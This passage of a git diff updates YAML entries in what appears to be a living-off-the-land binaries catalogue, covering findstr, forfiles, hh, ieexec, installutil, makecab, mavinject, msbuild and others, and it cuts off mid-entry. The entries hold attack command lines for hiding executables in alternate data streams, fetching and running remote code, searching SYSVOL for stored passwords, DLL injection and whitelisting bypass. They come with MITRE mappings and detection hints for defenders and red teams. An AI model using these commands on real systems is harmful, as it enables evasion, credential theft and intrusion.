- Path: C:\Windows\SysWOW64\extrac32.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
- https://twitter.com/egre55/status/985994639202283520
|
||||
Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55
|
||||
|
||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
- Link: https://twitter.com/egre55/status/985994639202283520
|
||||
Acknowledgement:
|
||||
- Person: egre55
|
||||
Handle: '@egre55'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,23 +1,52 @@
|
||||
---
|
||||
Name: Findstr.exe
|
||||
Description: Add ADS, Search
|
||||
Author: ''
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||
Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.'
|
||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
||||
Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.'
|
||||
- Command: findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
|
||||
Description: 'Search for stored password in Group Policy files stored on SYSVOL.'
|
||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: findstr /S /I cpassword \\sysvol\policies\*.xml
|
||||
Description: Search for stored password in Group Policy files stored on SYSVOL.
|
||||
Usecase: Find credentials stored in cpassword attrbute
|
||||
Category: Credentials
|
||||
Privileges: User
|
||||
MitreID: T1081
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1081
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
|
||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.
|
||||
Usecase: Download/Copy file from webdav server
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1185
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1185
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\findstr.exe
|
||||
- c:\windows\sysWOW64\findstr.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\findstr.exe
|
||||
- Path: C:\Windows\SysWOW64\findstr.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: finstr.exe should normally not be invoked on a client system
|
||||
Resources:
|
||||
- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,22 +1,39 @@
|
||||
---
|
||||
Name: Forfiles.exe
|
||||
Description: Execute, Read ADS
|
||||
Author: ''
|
||||
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
||||
Description: 'Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.'
|
||||
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
|
||||
Usecase: Use forfiles to start a new process to evade defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
|
||||
Description: 'Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.'
|
||||
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
|
||||
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\system32\forfiles.exe
|
||||
- C:\Windows\sysWOW64\forfiles.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\forfiles.exe
|
||||
- Path: C:\Windows\SysWOW64\forfiles.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://twitter.com/vector_sec/status/896049052642533376
|
||||
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe
|
||||
|
||||
- Link: https://twitter.com/vector_sec/status/896049052642533376
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Acknowledgement:
|
||||
- Person: Eric
|
||||
Handle: '@vector_sec'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,22 +1,36 @@
|
||||
---
|
||||
Name: Gpscript.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: Used by group policy to process scripts
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Gpscript /logon
|
||||
Description: 'Executes logon scripts configured in Group Policy.'
|
||||
Description: Executes logon scripts configured in Group Policy.
|
||||
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: Gpscript /startup
|
||||
Description: 'Executes startup scripts configured in Group Policy.'
|
||||
Description: Executes startup scripts configured in Group Policy
|
||||
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\gpscript.exe
|
||||
- c:\windows\sysWOW64\gpscript.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\gpscript.exe
|
||||
- Path: C:\Windows\SysWOW64\gpscript.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Scripts added in local group policy
|
||||
- IOC: Execution of Gpscript.exe after logon
|
||||
Resources:
|
||||
- https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
|
||||
Notes: |
|
||||
Thanks to Oddvar Moe - @oddvarmoe
|
||||
Requires administrative rights and modifications to local group policy settings.
|
||||
|
||||
- Link: https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,23 +1,35 @@
|
||||
---
|
||||
Name: hh.exe
|
||||
Description: Download, Execute
|
||||
Author: ''
|
||||
Name: Hh.exe
|
||||
Description: Binary used for processing chm files in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: HH.exe http://www.google.com
|
||||
Description: Opens google's web page with HTML Help.
|
||||
- Command: HH.exe C:\
|
||||
Description: Opens c:\\ with HTML Help.
|
||||
- Command: HH.exe c:\windows\system32\calc.exe
|
||||
Description: 'Opens calc.exe with HTML Help.'
|
||||
- Command: HH.exe http://some.url/script.ps1
|
||||
Description: Open the target PowerShell script with HTML Help.
|
||||
Usecase: Download files from url
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: HH.exe c:\windows\system32\calc.exe
|
||||
Description: Executes calc.exe with HTML Help.
|
||||
Usecase: Execute process with HH.exe
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\hh.exe
|
||||
- c:\windows\sysWOW64\hh.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\hh.exe
|
||||
- Path: C:\Windows\SysWOW64\hh.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: hh.exe should normally not be in use on a normal workstation
|
||||
Resources:
|
||||
- https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
|
||||
Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
- Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,20 +1,29 @@
|
||||
---
|
||||
Name: Ie4unit.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: ie4unit.exe -BaseSettings
|
||||
Description: 'Executes commands from a specially prepared ie4uinit.inf file.'
|
||||
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
||||
Usecase: Get code execution by copy files to another location
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- 'c:\windows\system32\ie4unit.exe '
|
||||
- 'c:\windows\sysWOW64\ie4unit.exe '
|
||||
- 'c:\windows\system32\ieuinit.inf '
|
||||
- 'c:\windows\sysWOW64\ieuinit.inf '
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: c:\windows\system32\ie4unit.exe
|
||||
- Path: c:\windows\sysWOW64\ie4unit.exe
|
||||
- Path: c:\windows\system32\ieuinit.inf
|
||||
- Path: c:\windows\sysWOW64\ieuinit.inf
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: ie4unit.exe loading a inf file from outside %windir%
|
||||
Resources:
|
||||
- https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
||||
Notes: Thanks to Jimmy - @bohops
|
||||
|
||||
- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
@ -1,18 +1,35 @@
|
||||
---
|
||||
Name: IEExec.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Name: Ieexec.exe
|
||||
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: 'Executes bypass.exe from the remote server.'
|
||||
- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
Usecase: Download and run attacker code from remote location
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
Usecase: Download and run attacker code from remote location
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\ieexec.exe
|
||||
- c:\windows\sysWOW64\ieexec.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
||||
Notes: Thanks to Casey Smith - @subtee
|
||||
|
||||
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
@ -1,20 +1,28 @@
|
||||
---
|
||||
Name: InfDefaultInstall.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Name: Infdefaultinstall.exe
|
||||
Description: Binary used to perform installation based on content inside inf files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
|
||||
Description: 'Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.'
|
||||
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
|
||||
Usecase: Code execution
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\Infdefaultinstall.exe
|
||||
- c:\windows\sysWOW64\Infdefaultinstall.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
||||
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
||||
Code Sample:
|
||||
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://twitter.com/KyleHanslovan/status/911997635455852544
|
||||
- https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||
- https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
|
||||
Notes: Thanks to Kyle Hanslovan - @kylehanslovan
|
||||
|
||||
- Link: https://twitter.com/KyleHanslovan/status/911997635455852544
|
||||
- Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
|
||||
Acknowledgement:
|
||||
- Person: Kyle Hanslovan
|
||||
Handle: '@kylehanslovan'
|
||||
---
|
@ -1,25 +1,42 @@
|
||||
---
|
||||
Name: InstallUtil.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Name: Installutil.exe
|
||||
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: 'Execute the target .NET DLL or EXE.'
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
Usecase: Use to execute code and bypass application whitelisting
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1118
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1118
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
Usecase: Use to execute code and bypass application whitelisting
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1118
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1118
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
|
||||
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||||
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
|
||||
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
|
||||
- http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
|
||||
- https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
|
||||
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
Notes: Thanks to Casey Smith - @subtee
|
||||
|
||||
- Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
|
||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
|
||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1118/T1118.md
|
||||
- Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
|
||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
@ -1,22 +1,44 @@
|
||||
---
|
||||
Name: Makecab.exe
|
||||
Description: Package, Add ADS, Download
|
||||
Author: ''
|
||||
Description: Binary to package existing files into a cabinet (.cab) file
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
|
||||
Description: Compresses the target file and stores it in the target file.
|
||||
Usecase: Hide data compressed into an alternate data stream
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
|
||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Hide data compressed into an alternate data stream
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
|
||||
Description: Download and compresses the target file and stores it in the target file.
|
||||
Usecase: Download file and compress into a cab file
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\makecab.exe
|
||||
- c:\windows\sysWOW64\makecab.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\makecab.exe
|
||||
- Path: C:\Windows\SysWOW64\makecab.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Makecab getting files from Internet
|
||||
- IOC: Makecab storing data into alternate data streams
|
||||
Resources:
|
||||
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,22 +1,39 @@
|
||||
---
|
||||
Name: Mavinject.exe
|
||||
Description: Execute, Read ADS
|
||||
Author: ''
|
||||
Description: Used by App-v in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
|
||||
Description: Inject evil.dll into a process with PID 3110.
|
||||
Usecase: Inject dll file into running process
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
|
||||
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172.
|
||||
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
|
||||
Usecase: Inject dll file into running process
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\System32\mavinject.exe
|
||||
- C:\Windows\SysWOW64\mavinject.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\mavinject.exe
|
||||
- Path: C:\Windows\SysWOW64\mavinject.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
||||
Resources:
|
||||
- https://twitter.com/gN3mes1s/status/941315826107510784
|
||||
- https://twitter.com/Hexcorn/status/776122138063409152
|
||||
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe
|
||||
|
||||
- Link: https://twitter.com/gN3mes1s/status/941315826107510784
|
||||
- Link: https://twitter.com/Hexcorn/status/776122138063409152
|
||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Acknowledgement:
|
||||
- Person: Giuseppe N3mes1s
|
||||
Handle: '@gN3mes1s'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,27 +1,44 @@
|
||||
---
|
||||
Name: Msbuild.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Name: Msbuild.exe
|
||||
Description: Used to compile and execute code
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: msbuild.exe pshell.xml
|
||||
Description: Build and execute a C# project stored in the target XML file.
|
||||
- Command: msbuild.exe Msbuild.csproj
|
||||
Description: Build and execute a C# project stored in the target CSPROJ file.
|
||||
Usecase: Compile and run code
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: msbuild.exe project.csproj
|
||||
Description: Build and execute a C# project stored in the target csproj file.
|
||||
Usecase: Compile and run code
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
||||
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
|
||||
- C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
|
||||
- C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
|
||||
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
|
||||
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||
Resources:
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
|
||||
- https://github.com/Cn33liz/MSBuildShell
|
||||
- https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
|
||||
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis
|
||||
|
||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md
|
||||
- Link: https://github.com/Cn33liz/MSBuildShell
|
||||
- Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
|
||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
- Person: Cn33liz
|
||||
Handle: '@Cneelis'
|
||||
---
|
@ -1,19 +1,27 @@
|
||||
---
|
||||
Name: Msconfig.exe
|
||||
Description: Execute
|
||||
